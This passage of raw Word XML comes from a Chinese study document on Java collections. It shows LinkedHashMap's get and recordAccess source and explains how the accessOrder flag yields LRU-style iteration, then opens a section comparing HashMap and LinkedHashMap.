          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="133350"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="16" name="图片 11" descr="收藏代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId22" tooltip="&quot;收藏这段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收藏代码">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;收藏这段代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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 Returns the value to which the specified key is mapped,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 or {@code null} if this map contains no mapping for the key.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 &lt;p&gt;More formally, if this map contains a mapping from a key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 {@code k} to a value {@code v} such that {@code (key==null ? k==null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 key.equals(k))}, then this method returns {@code v}; otherwise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 it returns {@code null}.  (There can be at most one such mapping.)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 &lt;p&gt;A return value of {@code null} does not &lt;i&gt;necessarily&lt;/i&gt;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 indicate that the map contains no mapping for the key; it's also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 possible that the map explicitly maps the key to {@code null}.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 The {@link #containsKey containsKey} operation may be used to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 distinguish these two cases.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keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> V get(Object key)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Entry&lt;K, V&gt; e = (Entry&lt;K, V&gt;)getEntry(key);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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> (e == </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>null</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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>null</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e.recordAccess(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>this</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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> e.value;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 This method is invoked by the superclass whenever the value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 of a pre-existing entry is read by Map.get or modified by Map.set.</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lastRenderedPageBreak/>
        <w:t>  * If the enclosing Map is access-ordered, it moves the entry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 to the end of the list; otherwise, it does nothing.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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> recordAccess(HashMap&lt;K, V&gt; m)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LinkedHashMap&lt;K, V&gt; lm = (LinkedHashMap&lt;K, V&gt;)m;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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> (lm.accessOrder)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lm.modCount++;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remove();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addBefore(lm.header);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 Removes this entry from the linked list.</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keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> remove()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before.after = after;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after.before = before;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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里我们来看一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>recordAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上面我们不是讲过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>accessOrder</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个参数值控制着</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的迭代顺序嘛，这里我们来看一下。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>accessOrder</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法就是将当前元素从双向链表中移除，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> addBefore</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法再将当前元素插入到链表的头部去，这样最近读到的元素，在迭代的时候是优先被迭代出来的！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这就是所谓的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LRU</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>算法（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Least Recently Used</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）：最近最少使用算法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>accessOrder</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，不做任何事情，就按照插入顺序迭代出来！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00B770DD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B770DD" w:rsidRPr="00F41A4C" w:rsidRDefault="00B770DD" w:rsidP="00B770DD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B770DD" w:rsidRPr="00F41A4C" w:rsidRDefault="00B770DD" w:rsidP="00B770DD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>资料</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B36D20" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://boy00fly.iteye.com/blog/1144691  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B770DD" w:rsidRPr="00F41A4C" w:rsidRDefault="00B770DD" w:rsidP="00B770DD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">      http://zhangshixi.iteye.com/blog/673789</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93415" w:rsidRPr="00F41A4C" w:rsidRDefault="00F93415" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F546D" w:rsidRPr="00F41A4C" w:rsidRDefault="00946A94" w:rsidP="00CD71C1">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r w:rsidR="00CD71C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00AE78CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="009F546D" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="001917F7" w:rsidRPr="00F41A4C">
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidR="001917F7" w:rsidRPr="00F41A4C">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="009F546D" w:rsidRPr="00F41A4C">
        <w:t>LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidR="002A7343" w:rsidRPr="00F41A4C">
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F546D" w:rsidRPr="00F41A4C" w:rsidRDefault="009F546D" w:rsidP="009F546D">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最大的不同在于，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后者维护者一个运行于所有条目的双向链表。有了这个双向链表，就可以在迭代的时候按照插入的顺序迭代出元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F546D" w:rsidRPr="00F41A4C" w:rsidRDefault="009F546D" w:rsidP="009F546D">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F546D" w:rsidRPr="00F41A4C" w:rsidRDefault="009F546D" w:rsidP="009F546D">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
